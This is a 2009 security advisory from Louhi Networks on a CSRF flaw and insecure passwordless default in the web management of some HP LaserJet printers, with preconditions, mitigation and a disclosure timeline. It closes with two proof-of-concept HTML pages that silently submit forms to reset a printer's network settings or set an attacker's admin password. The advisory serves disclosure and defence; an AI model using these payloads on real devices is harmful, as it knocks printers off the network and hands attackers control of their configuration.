<<< Date Index >>>     <<< Thread Index >>>

HP Laserjet multiple models web management CSRF vulnerability & insecure default configuration



                          Louhi Networks Oy
                       -= Security Advisory =-


      Advisory: HP LaserJet multiple models web management CSRF
                vulnerability & insecure default configuration
  Release Date: 2009-03-17
 Last Modified: 2009-03-17
       Authors: Henri Lindberg, CISA
                [henri d0t lindberg at louhi d0t fi]

   Application: HP Embedded Web Server
       Devices: HP LaserJet M1522n MFP,
                HP Color LaserJet 2605dtn
                possibly other HP products
  Attack type : CSRF
          Risk: Low
 Vendor Status: Issue documented in a customer notice
    References: http://www.louhinetworks.fi/advisory/HP_20090317.txt
http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c01684566


Overview:

    Quote from http://www.hp.com:

    "Increase effectiveness and productivity with an easy-to-use
     high-performance HP MFP. HP spherical toner and an intelligent
     cartridge optimise print quality and reliability. Do more with
     fast, high-quality print, copy, scan and fax functionality.

     This affordable HP MFP delivers print, copy, scan and fax
     functionality. Hi-Speed USB 2.0 connectivity and fast,
     secure networking enable you to  easily share this device.
     Handle complex files with a 450 MHz processor and memory up to
     64 MB."


Details:

     Default configuration for the device does not require user to
     define password for configuration changes.

     Insecure out-of-the-box configuration combined with CSRF
     vulnerability in web management interface allows attacker to
     perform unwanted configuration changes through user's browser.

     Successful exploitation requires:
     1) Out-of-the-box configuration (no management password)
     2) Internal user with access to web management interface
     3) Knowledge of target printer's DNS name or IP address
     4) Ability to lure internal user to a malicious website or
        ability to inject malicious HTML/javascript to website
        frequented by said internal user.

     Simplest management interfaces contains few interesting
     features, most significant impact can be achieved with invalid
     network configuration. This results in denial-of-service
     condition, requiring manual reconfiguration in order to
     restore network connectivity.

     More advanced management interfaces based on the some software
     may contain additional features suitable for exploitation.
     It is recommended to check the features of management interface
     in order to determine the actual risk for the used product.

Mitigation:

     1) Set administrator password
     2) Do not browse untrusted sites while logged on to the
        management interface


Advisory timeline:
      2009-02-17  Contacted vendor through e-mail.
      2009-02-17  Vendor response.
      2009-03-12  Vendor decides not to patch but to release
                  a customer notice
      2009-03-17  Coordinated release of information
                  Vendor's customer notice:
                  HP Security Notice HPSN-2009-001 rev.1
                  HP LaserJet Printers, HP Edgeline Printers,
                  and HP Digital Senders - Unverified Input



Proof of Concept:

<html>
<head><title>Network</title></head>
<body onload="document.CSRF.submit();">
<FORM name="CSRF" method="post" ACTION="http://1.2.3.4/hp/device/config_result_YesNo.html/config";; style="display:none">
<input name="Clear" value="Yes">
<input name="Menu" value="NetIPChange">
<input name="Configuration" value="IPConfig=Man&amp;IPAddr=1.1.1.1&amp;SN=2.2.2.2&amp;GW=3.3.3.3&amp;WINS=0.0.0.0">
</form>
</body>
</html>

Invalid value for "Configuration" parameter sets IP, mask and gw to 255.255.255.255


<html>
<head><title>Set password</title></head>
<body onload="document.CSRF.submit()">
<FORM name="CSRF" method="post" ACTION="http://1.2.3.4/hp/device/set_config_password.html/config";; style="display:none">
  <INPUT type="password" name="Password" MAXLENGTH="16" VALUE="evil">
  <INPUT type="password" name="ConfirmPassword" MAXLENGTH="16" VALUE="evil">
  <INPUT type="hidden" VALUE="System">
</FORM>
</body>
<html>